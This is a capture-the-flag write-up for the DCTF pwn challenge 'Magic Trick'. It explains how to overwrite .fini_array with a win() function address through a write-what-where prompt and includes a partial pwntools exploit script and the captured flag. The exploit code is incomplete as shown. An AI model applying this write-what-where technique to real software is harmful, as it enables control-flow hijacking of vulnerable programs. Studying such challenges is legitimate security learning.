Rating: 4.0

## Magic Trick (300 Points)

### Problem
How about a magic trick?
nc dctf-chall-magic-trick.westeurope.azurecontainer.io 7481

File: magic_trick

### Solution
Let me start by saying, I think I solved this chall by blind luck of stumbling on a writeup for a similar style Pwn challenge.

Anyway, firstly, I ran `checksec` to see what I was dealing with.

❯ pwn checksec magic_trick
[*] '~/ctf/dctf/magic_trick'
Arch: amd64-64-little
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)

I opened the binary in Ghidra and inspected the important functions - `main()`, `magic()`, and `win()`.

We need to get from `magic()` to `win()` without any overflows this time.

We're prompted twice for input - something to write, and a place to write it. I'm not really sure where to go with this so I do some searching of old CTF writeups to see if I can see anything similar.

puts("What do you want to write");
puts("Where do you want to write it");

I came across [this writeup](https://github.com/guyinatuxedo/ctf/tree/master/tokyowesterns16/pwn/greeting) where the author is prompted for input and there's a bunch of pointers with no way to overflow. The author mentions that as the binary is not RELRO enabled, they can write to the GOT Table and as PIE isn't enabled, they can see the addresses of the GOT table. We're in the same scenario!

The author eventually goes on to mention that as a buffer overflow isn't possible due to `__stack_chk_fail()`, they can instead write to `.fini_array`.

So, with that, I went and got the address of `.fini_array` in Ghidra (`0x00600a00`), and then I went and got the address of `win()` in Ghidra(`0x00400667`).

The program asks us what we write, and where we want to write it - it kind of makes sense to me to write the `win()` address to the `.fini_array` address.
Let's write some Python to do that for us...

from pwn import *

host = remote('dctf-chall-magic-trick.westeurope.azurecontainer.io', 7481)

win_addr = str(0x00400667)
fini_addr = str(0x00600a00)



❯ python3 exploit.py
[+] Opening connection to dctf-chall-magic-trick.westeurope.azurecontainer.io on port 7481: Done
[*] Switching to interactive mode
You are a real magician
[*] Got EOF while reading in interactive

On one hand I'm glad I got the flag here, but I don't fully understand **why** this was the right thing to do. It's something I'll build on in the next few CTFs, I'm sure.

Flag: `dctf{1_L1k3_M4G1c}`

Original writeup (https://github.com/cieran/writeups/blob/main/DragonCTF/pwn/MagicTrick.md).